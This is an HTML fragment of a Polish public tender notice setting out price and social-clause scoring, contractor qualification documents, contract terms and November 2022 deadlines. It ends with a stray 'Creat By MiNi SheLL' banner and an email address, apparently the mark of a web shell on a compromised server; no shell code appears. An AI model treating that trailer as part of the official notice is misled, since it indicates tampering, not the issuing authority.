CENA<br/>Kryterium cena (C) - waga 90%<br/>Kryterium będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu zamówienia, podanej przez Wykonawcę w ofercie.<br/>Zamawiający przyzna punkty na podstawie poniższego wzoru:<br/><br/>Najniższa cena jednostkowa brutto za 1h<br/>C = ---------------------------------------- x 90<br/>Cena jednostkowa brutto za 1 h badanej oferty<br/><br/> C – ilość punktów przyznana w kryterium cena<br/>Przy ocenie w kryterium „cena” najwyżej będzie punktowana oferta z najniższą ceną jednostkową brutto.<br/><br/>OPIS SZCZEGÓŁOWY DLA KRYTERIUM KLAUZULA SPOŁECZNA<br/> Kryterium klauzuli społecznej K– waga 10%<br/><br/> Oferta otrzyma 0 pkt za brak zatrudnienia osoby spełniającej warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/><br/> Oferta otrzyma 5 pkt za zatrudnienie 1 osoby spełniającej warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/><br/> Oferta otrzyma 10 pkt za zatrudnienie ≤ 2 osób spełniających warunek: osoba z niepełnosprawnościami, osoba bezrobotna lub taka, o której mowa w przepisach o zatrudnieniu socjalnym.<br/>Za osoby z niepełnosprawnościami, zgodnie z definicją wynikającą z Wytycznych w zakresie realizacji zasady równości szans i niedyskryminacji, w tym dostępności dla osób z niepełnosprawnościami oraz zasady równości szans kobiet i mężczyzn w ramach funduszy unijnych na lata 2014-2020 Ministra Infrastruktury i Rozwoju z dnia 5 kwietnia 2018r., uważa się osoby niepełnosprawne w rozumieniu ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2018 r., poz. 511), a także osoby z zaburzeniami psychicznymi, w rozumieniu ustawy z dnia 19 sierpnia 1994 r. o ochronie zdrowia psychicznego (Dz. U. z 2017 r., poz. 882 z późn.zm.).<br/><br/>Za osobę bezrobotną, uważa się osobę, o której mowa w art. 2 ust. 1 pkt 2 ustawy o promocji zatrudnienia i instytucjach rynku pracy z dnia 20 kwietnia 2004r. (tj. Dz. U. z 2022r. poz. 690 z późn. zm.).<br/><br/>Za osoby, o których mowa w przepisach o zatrudnieniu socjalnym, uważa się osoby, o których mowa w ustawie o zatrudnieniu socjalnym z dnia 13 czerwca 2003 r. (tj. Dz. U. 2020 r., poz. 176 z późn.zm.).<br/><br/>Punkty za kryterium klauzula społeczna zostaną przyznane na podstawie oświadczenia o spełnieniu klauzuli społecznej (Załącznik Nr 1 do SWZ). Wykonawca zobowiązuje się przy tym do utrzymania zatrudnienia w/w osób na zadeklarowanym poziomie przez cały okres obowiązywania umowy z Zamawiającym, jak również do przekazania na żądanie Zamawiającego informacji i dokumentów o ogólnej liczbie osób zatrudnionych oraz liczbie zatrudnionych osób z niepełnosprawnościami, osób bezrobotnych lub takich o których mowa w przepisach o zatrudnieniu socjalnym lub dokumentów potwierdzających spełnienie tych warunków<br/><br/>Zamawiający w ramach każdego pakietu dokona wyboru oferty tego z Wykonawców, która uzyska w wyniku oceny ofert najwyższą liczbę punktów. Przyznanie punktów poszczególnym ofertom odbędzie się w oparciu o następujący wzór:<br/><br/>Ocena oferty = C + K<br/><br/>7Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taką samą liczbę punktów, Zamawiający wybierze ofertę z najniższą ceną.<br/>Zamawiający zastosuje zaokrąglenie każdego wyniku do dwóch miejsc po przecinku.<br/>Najkorzystniejszą ofertę, Zamawiający wybierze spośród ofert nie odrzuconych.<br/><br/>Ocena będzie dokonywana oddzielnie dla poszczególnych części zamówienia.<br/><br/>Szczegółowy opis oceny ofert znajduje się w Dziale XXVI SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">90</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">klauzula społeczna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu, na zasadach określonych w Dziale XIV SWZ oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający od wykonawcy, którego oferta zostanie oceniona najwyżej będzie żądał poniższych podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia, na wezwanie Zamawiającego: <br/>- Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego, o których mowa w art. 108 ust. 1 Pzp – zgodnie z Załącznikiem nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">- Oświadczenia, o których mowa w Dziale XVII ust. 2 SWZ, stanowią dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w postępowaniu, odpowiednio na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. <br/>- W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenia, o których mowa w Dziale XVII ust. 2 pkt 1) i pkt 2), składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>- Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniami, o których mowa w Dziale XVII ust. 2 SWZ, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim wykonawca powołuje się na jego zasoby. <br/><br/>Podmiotowe środki dowodowe wymagane od Wykonawcy, którego oferta zostanie najwyżej oceniona.<br/>Na potwierdzenie spełniania warunków udziału w postępowaniu Zamawiający żąda poniższych podmiotowych środków dowodowych: - wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za realizację zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacje o podstawie do dysponowania tymi osobami na druku zgodnym z treścią załącznika nr 7 do niniejszej SWZ<br/>- oświadczenia dotyczącego miesięcznej ilości godzin zaangażowania zawodowego nauczyciela- zgodnie ze wzorem stanowiącym Załącznik nr 6 do SWZ;</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do formularza oferty stanowiącego Załącznik nr 1 do SWZ należy dołączyć:<br/>- oświadczenie o braku podstaw wykluczenia - zgodnie ze wzorem stanowiącym Załącznik nr 2 do SWZ;<br/>- oświadczenie o spełnieniu warunków udziału w postępowaniu - zgodnie z wzorem stanowiącym Załącznik nr 3 do SWZ;<br/>- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia - zgodnie ze wzorem stanowiącym Załącznik nr 7 do SWZ.<br/>Wykaz dokumentów i oświadczeń wymaganych do złożenia z ofertą zawiera Dział XXI SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2.	W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Jeżeli została wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców. <br/>4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu na podstawie art. 108 ust. 1 ustawy Pzp, natomiast spełnienie warunków udziału w postępowaniu Wykonawcy wykazują zgodnie z Działem XIV ust. 1 pkt. 4 SWZ. <br/>5.	Celem wykazania braku podstaw do wykluczenia oraz spełnienia warunków udziału w postępowaniu, Wykonawcy składają oświadczenia i dokumenty określone w Dziale XVII SWZ w sposób i trybie tam określonym. <br/>6.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia został opisany w § 9 Załącznika nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-16 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">http://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com